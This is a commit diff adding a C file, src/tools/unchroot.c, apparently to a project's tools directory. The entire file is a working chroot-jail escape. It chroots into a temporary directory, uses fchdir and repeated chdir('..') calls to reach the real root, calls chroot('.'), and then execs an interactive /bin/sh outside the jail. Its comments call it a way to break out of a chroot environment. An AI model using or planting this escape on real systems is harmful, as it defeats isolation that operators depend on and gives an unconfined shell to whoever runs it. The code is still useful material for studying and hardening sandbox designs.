diff options
Diffstat (limited to 'src/tools/unchroot.c')
-rw-r--r-- | src/tools/unchroot.c | 125 |
1 files changed, 125 insertions, 0 deletions
diff --git a/src/tools/unchroot.c b/src/tools/unchroot.c new file mode 100644 index 000000000..21731296e --- /dev/null +++ b/src/tools/unchroot.c | |||
@@ -0,0 +1,125 @@ | |||
1 | #include <stdio.h> | ||
2 | #include <stdlib.h> | ||
3 | #include <errno.h> | ||
4 | #include <fcntl.h> | ||
5 | #include <string.h> | ||
6 | #include <unistd.h> | ||
7 | #include <sys/stat.h> | ||
8 | #include <sys/types.h> | ||
9 | |||
10 | /* | ||
11 | ** You should set NEED_FCHDIR to 1 if the chroot() on your | ||
12 | ** system changes the working directory of the calling | ||
13 | ** process to the same directory as the process was chroot()ed | ||
14 | ** to. | ||
15 | ** | ||
16 | ** It is known that you do not need to set this value if you | ||
17 | ** running on Solaris 2.7 and below. | ||
18 | ** | ||
19 | */ | ||
20 | #define NEED_FCHDIR 0 | ||
21 | |||
22 | #define TEMP_DIR "waterbuffalo" | ||
23 | |||
24 | /* Break out of a chroot() environment in C */ | ||
25 | |||
26 | int main() { | ||
27 | int x; /* Used to move up a directory tree */ | ||
28 | int done=0; /* Are we done yet ? */ | ||
29 | #ifdef NEED_FCHDIR | ||
30 | int dir_fd; /* File descriptor to directory */ | ||
31 | #endif | ||
32 | struct stat sbuf; /* The stat() buffer */ | ||
33 | |||
34 | /* | ||
35 | ** First we create the temporary directory if it doesn't exist | ||
36 | */ | ||
37 | if (stat(TEMP_DIR,&sbuf)<0) { | ||
38 | if (errno==ENOENT) { | ||
39 | if (mkdir(TEMP_DIR,0755)<0) { | ||
40 | fprintf(stderr,"Failed to create %s - %s\n", TEMP_DIR, | ||
41 | strerror(errno)); | ||
42 | exit(1); | ||
43 | } | ||
44 | } | ||
45 | else { | ||
46 | fprintf(stderr,"Failed to stat %s - %s\n", TEMP_DIR, | ||
47 | strerror(errno)); | ||
48 | exit(1); | ||
49 | } | ||
50 | } | ||
51 | else if (!S_ISDIR(sbuf.st_mode)) { | ||
52 | fprintf(stderr,"Error - %s is not a directory!\n",TEMP_DIR); | ||
53 | exit(1); | ||
54 | } | ||
55 | |||
56 | #ifdef NEED_FCHDIR | ||
57 | /* | ||
58 | ** Now we open the current working directory | ||
59 | ** | ||
60 | ** Note: Only required if chroot() changes the calling program's | ||
61 | ** working directory to the directory given to chroot(). | ||
62 | ** | ||
63 | */ | ||
64 | if ((dir_fd=open(".",O_RDONLY))<0) { | ||
65 | fprintf(stderr,"Failed to open \".\" for reading - %s\n", | ||
66 | strerror(errno)); | ||
67 | exit(1); | ||
68 | } | ||
69 | #endif | ||
70 | |||
71 | /* | ||
72 | ** Next we chroot() to the temporary directory | ||
73 | */ | ||
74 | if (chroot(TEMP_DIR)<0) { | ||
75 | fprintf(stderr,"Failed to chroot to %s - %s\n",TEMP_DIR, | ||
76 | strerror(errno)); | ||
77 | exit(1); | ||
78 | } | ||
79 | |||
80 | #ifdef NEED_FCHDIR | ||
81 | /* | ||
82 | ** Partially break out of the chroot by doing an fchdir() | ||
83 | ** | ||
84 | ** This only partially breaks out of the chroot() since whilst | ||
85 | ** our current working directory is outside of the chroot() jail, | ||
86 | ** our root directory is still within it. Thus anything which refers | ||
87 | ** to "/" will refer to files under the chroot() point. | ||
88 | ** | ||
89 | ** Note: Only required if chroot() changes the calling program's | ||
90 | ** working directory to the directory given to chroot(). | ||
91 | ** | ||
92 | */ | ||
93 | if (fchdir(dir_fd)<0) { | ||
94 | fprintf(stderr,"Failed to fchdir - %s\n", | ||
95 | strerror(errno)); | ||
96 | exit(1); | ||
97 | } | ||
98 | close(dir_fd); | ||
99 | #endif | ||
100 | |||
101 | /* | ||
102 | ** Completely break out of the chroot by recursing up the directory | ||
103 | ** tree and doing a chroot to the current working directory (which will | ||
104 | ** be the real "/" at that point). We just do a chdir("..") lots of | ||
105 | ** times (1024 times for luck :). If we hit the real root directory before | ||
106 | ** we have finished the loop below it doesn't matter as .. in the root | ||
107 | ** directory is the same as . in the root. | ||
108 | ** | ||
109 | ** We do the final break out by doing a chroot(".") which sets the root | ||
110 | ** directory to the current working directory - at this point the real | ||
111 | ** root directory. | ||
112 | */ | ||
113 | for(x=0;x<1024;x++) { | ||
114 | chdir(".."); | ||
115 | } | ||
116 | chroot("."); | ||
117 | |||
118 | /* | ||
119 | ** We're finally out - so exec a shell in interactive mode | ||
120 | */ | ||
121 | if (execl("/bin/sh","-i",NULL)<0) { | ||
122 | fprintf(stderr,"Failed to exec - %s\n",strerror(errno)); | ||
123 | exit(1); | ||
124 | } | ||
125 | } | ||